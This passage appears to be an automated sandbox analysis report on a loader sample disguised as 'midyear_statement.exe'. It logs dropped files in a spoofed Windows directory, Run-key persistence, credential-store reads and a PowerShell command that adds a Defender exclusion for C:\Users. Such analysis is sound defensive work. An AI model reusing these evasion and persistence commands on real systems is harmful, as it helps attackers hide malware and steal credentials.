                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: 8SG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: 8SG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: dMG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PSG24_2_0059F7A7
                      Source: C:\Users\user\Desktop\midyear_statement.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifSystem information queried: HandleInformationJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001C.00000002.1384508766.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: wkrriuhD.pif, 0000001B.00000002.1406746333.00000000028A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: midyear_statement.exeReversingLabs: Detection: 26%
                      Source: midyear_statement.exeVirustotal: Detection: 31%
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile read: C:\Users\user\Desktop\midyear_statement.exeJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Users\user\Desktop\midyear_statement.exe "C:\Users\user\Desktop\midyear_statement.exe"
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"
                      Source: C:\Windows \System32\2506803.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "Jump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"Jump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIFJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"Jump to behavior
                      Source: C:\Windows \System32\2506803.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"Jump to behavior
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Users\user\Desktop\midyear_statement.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: midyear_statement.exeStatic file information: File size 1265664 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 27.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 28.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 29.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifUnpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 0.2.midyear_statement.exe.2656dc8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.midyear_statement.exe.2a46bd8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.midyear_statement.exe.40a0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.midyear_statement.exe.2656dc8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.midyear_statement.exe.2a46bd8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: wkrriuhD.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_040B7A50
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .....
                      Source: midyear_statement.exeStatic PE information: real checksum: 0x0 should be: 0x139d32
                      Source: netutils.dll.0.drStatic PE information: real checksum: 0x22e25 should be: 0x1cc51
                      Source: wkrriuhD.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: Dhuirrkw.PIF.23.drStatic PE information: real checksum: 0x0 should be: 0x139d32
                      Source: 2506803.exe.0.drStatic PE information: section name: .imrsiv
                      Source: netutils.dll.0.drStatic PE information: section name: .....
                      Source: netutils.dll.0.drStatic PE information: section name: .....
                      Source: netutils.dll.0.drStatic PE information: section name: ......
                      Source: netutils.dll.0.drStatic PE information: section name: ......
                      Source: netutils.dll.0.drStatic PE information: section name: ......
                      Source: netutils.dll.0.drStatic PE information: section name: ....
                      Source: netutils.dll.0.drStatic PE information: section name: ......
                      Source: netutils.dll.0.drStatic PE information: section name: ......
                      Source: netutils.dll.0.drStatic PE information: section name: ....
                      Source: netutils.dll.0.drStatic PE information: section name: ......
                      Source: netutils.dll.0.drStatic PE information: section name: /4
                      Source: netutils.dll.0.drStatic PE information: section name: /19
                      Source: netutils.dll.0.drStatic PE information: section name: /31
                      Source: netutils.dll.0.drStatic PE information: section name: /45
                      Source: netutils.dll.0.drStatic PE information: section name: /57
                      Source: netutils.dll.0.drStatic PE information: section name: /70
                      Source: netutils.dll.0.drStatic PE information: section name: /81
                      Source: netutils.dll.0.drStatic PE information: section name: /92
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD48C push ecx; mov dword ptr [esp], edx0_2_040BD491
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040AC4B0 push ecx; mov dword ptr [esp], edx0_2_040AC4B5
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040AD4E4 push 040AD510h; ret 0_2_040AD508
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A66FA push 040A673Eh; ret 0_2_040A6736
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A66FC push 040A673Eh; ret 0_2_040A6736
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CB0AC push 040CB125h; ret 0_2_040CB11D
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CB144 push 040CB1ECh; ret 0_2_040CB1E4
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CB1F8 push 040CB288h; ret 0_2_040CB280
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CA2A4 push 040CA4A4h; ret 0_2_040CA49C
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A32C0 push eax; ret 0_2_040A32FC
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CB2F4 push 040CB35Fh; ret 0_2_040CB357
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A631E push 040A637Bh; ret 0_2_040A6373
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A6320 push 040A637Bh; ret 0_2_040A6373
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CC360 pushad ; ret 0_2_040CC365
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7C48 push 040B7C80h; ret 0_2_040B7C78
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7C46 push 040B7C80h; ret 0_2_040B7C78
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B5DC0 push ecx; mov dword ptr [esp], edx0_2_040B5DC2
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B2EA4 push 040B2F1Ah; ret 0_2_040B2F12
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040CEF18 push eax; ret 0_2_040CEFE8
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B2FAF push 040B2FFDh; ret 0_2_040B2FF5
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B2FB0 push 040B2FFDh; ret 0_2_040B2FF5
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7850 push 040B78CDh; ret 0_2_040B78C5
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B688A push 040B6937h; ret 0_2_040B692F
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B688C push 040B6937h; ret 0_2_040B692F
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B9AF8 push 040B9B30h; ret 0_2_040B9B28
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040ACB2B push 040ACCB6h; ret 0_2_040ACCAE
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040ACB30 push 040ACCB6h; ret 0_2_040ACCAE
                      Source: C:\Windows \System32\2506803.exeCode function: 16_2_613D0021 pushfq ; iretd 16_2_613D002A
                      Source: C:\Windows \System32\2506803.exeCode function: 16_2_613D0D00 pushfq ; ret 16_2_613D0D01
                      Source: C:\Windows \System32\2506803.exeCode function: 16_2_613D1DFE push rsp; iretd 16_2_613D1DFF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_00402DB4 push eax; ret 24_2_00402E84

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Dhuirrkw.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Users\Public\Libraries\wkrriuhD.pifJump to dropped file
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows \System32\2506803.exeJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12336EB0 ShellExecuteW,URLDownloadToFileW,24_2_12336EB0
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\2506803.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Dhuirrkw.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Users\Public\Libraries\wkrriuhD.pifJump to dropped file
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\netutils.dllJump to dropped file
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\2506803.exeJump to dropped file
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\netutils.dllJump to dropped file
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,24_2_1234AA4A
                      Source: C:\Users\user\Desktop\midyear_statement.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DhuirrkwJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DhuirrkwJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B9B34 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_040B9B34
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
